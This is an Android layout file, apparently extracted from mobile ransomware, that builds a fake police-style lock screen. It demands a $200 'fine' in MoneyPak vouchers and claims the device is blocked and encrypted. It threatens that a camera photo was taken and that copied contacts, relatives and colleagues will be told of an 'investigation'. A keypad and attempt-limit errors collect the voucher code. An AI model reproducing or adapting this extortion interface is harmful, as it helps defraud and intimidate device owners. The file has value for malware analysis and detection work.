<?xml version="1.0" encoding="utf-8"?>
<ScrollView android:id="@id/mpack_form" android:background="#ffffffff" android:layout_width="fill_parent" android:layout_height="fill_parent"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <LinearLayout android:orientation="vertical" android:background="#ffffffff" android:layout_width="fill_parent" android:layout_height="wrap_content">
        <TextView android:textAppearance="?android:textAppearanceLarge" android:textSize="20.0sp" android:textStyle="bold|italic" android:textColor="#ff2e2e2e" android:id="@id/avoid" android:focusable="true" android:focusableInTouchMode="true" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="20.0dip" android:text="Amount of fine is $200." />
        <LinearLayout android:layout_width="fill_parent" android:layout_height="wrap_content">
            <ImageView android:id="@id/photo_id" android:layout_width="100.0dip" android:layout_height="150.0dip" android:layout_marginLeft="20.0dip" android:layout_marginTop="10.0dip" />
            <LinearLayout android:orientation="vertical" android:layout_width="wrap_content" android:layout_height="wrap_content">
                <TextView android:textSize="16.0sp" android:textColor="#ff424242" android:id="@id/textView1" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="20.0dip" android:layout_marginTop="5.0dip" android:layout_marginRight="20.0dip" android:text="You can settle the fine with MoneyPak express Packet vouchers." />
                <TextView android:textSize="15.0sp" android:textStyle="bold|italic" android:textColor="#ff424242" android:id="@id/threat" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="20.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="20.0dip" android:text="As soon as the money arrives to the Treasure account, your device will be unblocked and all information will be decrypted in course of 24 hours." />
            </LinearLayout>
        </LinearLayout>
        <TextView android:textSize="17.0sp" android:textStyle="bold" android:textColor="#ff424242" android:id="@id/photo_mark" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="20.0dip" android:layout_marginTop="5.0dip" android:layout_marginRight="20.0dip" android:text="We made a photo with your camera, it will be added to the investigation." />
        <TextView android:textSize="17.0sp" android:textStyle="bold" android:textColor="#ff424242" android:id="@id/contacts_book" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="20.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="20.0dip" android:text="All your contacts are copied. If you do not pay the fine, we will notify your relatives and colleagues about the investigation." />
        <LinearLayout android:gravity="center_horizontal" android:layout_gravity="center_horizontal" android:orientation="vertical" android:id="@id/contacts_id" android:background="@drawable/invest" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="15.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="15.0dip" android:layout_marginBottom="5.0dip">
            <ListView android:scrollbarAlwaysDrawVerticalTrack="true" android:id="@id/cont_list" android:fitsSystemWindows="true" android:layout_width="fill_parent" android:layout_height="200.0dip" android:drawSelectorOnTop="false" android:fastScrollEnabled="true" android:smoothScrollbar="true" />
            <TextView android:textSize="16.0sp" android:textColor="#ffffffff" android:id="@id/contacts_id_" android:visibility="gone" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="8.0dip" android:layout_marginTop="15.0dip" android:layout_marginRight="8.0dip" android:text="" />
        </LinearLayout>
        <Button android:textColor="#ff424242" android:id="@id/help" android:background="#ffcfcfcf" android:layout_width="fill_parent" android:layout_height="40.0dip" android:layout_marginLeft="10.0dip" android:layout_marginTop="5.0dip" android:layout_marginRight="10.0dip" android:text="Where i can buy MoneyPak?" />
        <LinearLayout android:orientation="vertical" android:id="@id/mpack_buy" android:background="#ffffffff" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="wrap_content">
            <TextView android:textAppearance="?android:textAppearanceMedium" android:textSize="14.0sp" android:textColor="#ff585858" android:id="@id/path" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="20.0dip" android:layout_marginTop="5.0dip" android:text="all 92 000 stores on moneypak.com/StoreLocator.aspx" />
            <ImageView android:id="@id/imageView2" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="5.0dip" android:layout_marginTop="-25.0dip" android:layout_marginRight="5.0dip" android:src="@drawable/moneypak_retails" />
        </LinearLayout>
        <LinearLayout android:gravity="center_horizontal" android:layout_gravity="center_horizontal" android:orientation="vertical" android:id="@id/mp_loaded" android:background="@drawable/loaded_mp" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="fill_parent" android:layout_marginLeft="20.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="20.0dip" android:layout_marginBottom="12.0dip">
            <TextView android:textAppearance="?android:textAppearanceMedium" android:textColor="#ffffffff" android:id="@id/textView4" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="10.0dip" android:layout_marginTop="20.0dip" android:layout_marginRight="10.0dip" android:layout_marginBottom="20.0dip" android:text="Your request will be processed winthin 24 hours." />
        </LinearLayout>
        <LinearLayout android:gravity="center_horizontal" android:layout_gravity="center_horizontal" android:orientation="vertical" android:id="@id/error" android:background="@drawable/error" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="fill_parent" android:layout_marginLeft="20.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="20.0dip">
            <TextView android:textAppearance="?android:textAppearanceMedium" android:textColor="#ffffffff" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="10.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="10.0dip" android:layout_marginBottom="10.0dip" android:text="Wrong MoneyPak code. You have only 3 attempts. Please try again." />
        </LinearLayout>
        <LinearLayout android:gravity="center_horizontal" android:layout_gravity="center_horizontal" android:orientation="vertical" android:id="@id/used_code" android:background="@drawable/error" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="fill_parent" android:layout_marginLeft="20.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="20.0dip">
            <TextView android:textAppearance="?android:textAppearanceMedium" android:textColor="#ffffffff" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="10.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="10.0dip" android:layout_marginBottom="10.0dip" android:text="This code is on processing. You must use another code." />
        </LinearLayout>
        <LinearLayout android:gravity="center_horizontal" android:layout_gravity="center_horizontal" android:orientation="vertical" android:id="@id/reseted" android:background="@drawable/error" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="fill_parent" android:layout_marginLeft="20.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="20.0dip">
            <TextView android:textAppearance="?android:textAppearanceMedium" android:textColor="#ffffffff" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginLeft="10.0dip" android:layout_marginTop="10.0dip" android:layout_marginRight="10.0dip" android:layout_marginBottom="10.0dip" android:text="Code you entered is incorrect.\n\nTerm unlock will be increased at a similar attempt." />
        </LinearLayout>
        <LinearLayout android:orientation="vertical" android:id="@id/payform" android:layout_width="fill_parent" android:layout_height="wrap_content">
            <EditText android:textColor="#ff000555" android:gravity="center" android:layout_gravity="center" android:id="@id/mp_code" android:background="#ffffffff" android:layout_width="fill_parent" android:layout_height="wrap_content" android:layout_marginLeft="50.0dip" android:layout_marginTop="5.0dip" android:layout_marginRight="50.0dip" android:hint="MoneyPak voucher code" android:cursorVisible="false" android:ems="10" android:maxLength="20" android:editable="false" />
            <LinearLayout android:gravity="center_horizontal" android:layout_gravity="center_horizontal" android:layout_width="fill_parent" android:layout_height="wrap_content" android:layout_marginTop="5.0dip">
                <Button android:textColor="#ff424242" android:id="@id/butt_1" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:layout_marginRight="5.0dip" android:text="1" />
                <Button android:textColor="#ff424242" android:id="@id/butt_2" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:text="2" />
                <Button android:textColor="#ff424242" android:id="@id/butt_3" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:layout_marginLeft="5.0dip" android:text="3" />
            </LinearLayout>
            <LinearLayout android:gravity="center_horizontal" android:layout_gravity="center_horizontal" android:layout_width="fill_parent" android:layout_height="wrap_content" android:layout_marginTop="5.0dip">
                <Button android:textColor="#ff424242" android:id="@id/butt_4" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:layout_marginRight="5.0dip" android:text="4" />
                <Button android:textColor="#ff424242" android:id="@id/butt_5" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:text="5" />
                <Button android:textColor="#ff424242" android:id="@id/butt_6" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:layout_marginLeft="5.0dip" android:text="6" />
            </LinearLayout>
            <LinearLayout android:gravity="center_horizontal" android:layout_gravity="center_horizontal" android:background="#ffffffff" android:layout_width="fill_parent" android:layout_height="wrap_content" android:layout_marginTop="5.0dip">
                <Button android:textColor="#ff424242" android:id="@id/butt_7" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:layout_marginRight="5.0dip" android:text="7" />
                <Button android:textColor="#ff424242" android:id="@id/butt_8" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:text="8" />
                <Button android:textColor="#ff424242" android:id="@id/butt_9" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:layout_marginLeft="5.0dip" android:text="9" />
            </LinearLayout>
            <LinearLayout android:gravity="center_horizontal" android:layout_gravity="center_horizontal" android:layout_width="fill_parent" android:layout_height="wrap_content" android:layout_marginTop="5.0dip">
                <Button android:textColor="#ff424242" android:id="@id/butt_0" android:background="#ffcfcfcf" android:layout_width="70.0dip" android:layout_height="40.0dip" android:text="0" />
            </LinearLayout>
            <LinearLayout android:orientation="vertical" android:layout_width="fill_parent" android:layout_height="wrap_content" android:layout_marginLeft="10.0dip" android:layout_marginTop="30.0dip" android:layout_marginRight="10.0dip" android:layout_marginBottom="10.0dip">
                <Button android:textStyle="bold" android:textColor="#ff424242" android:id="@id/clear" android:background="#ffcfcfcf" android:layout_width="fill_parent" android:layout_height="40.0dip" android:layout_marginBottom="7.0dip" android:text="Clear" />
                <Button android:textStyle="bold" android:textColor="#ff424242" android:id="@id/proceed" android:background="#ffcfcfcf" android:layout_width="fill_parent" android:layout_height="40.0dip" android:text="Proceed" />
            </LinearLayout>
        </LinearLayout>
    </LinearLayout>
</ScrollView>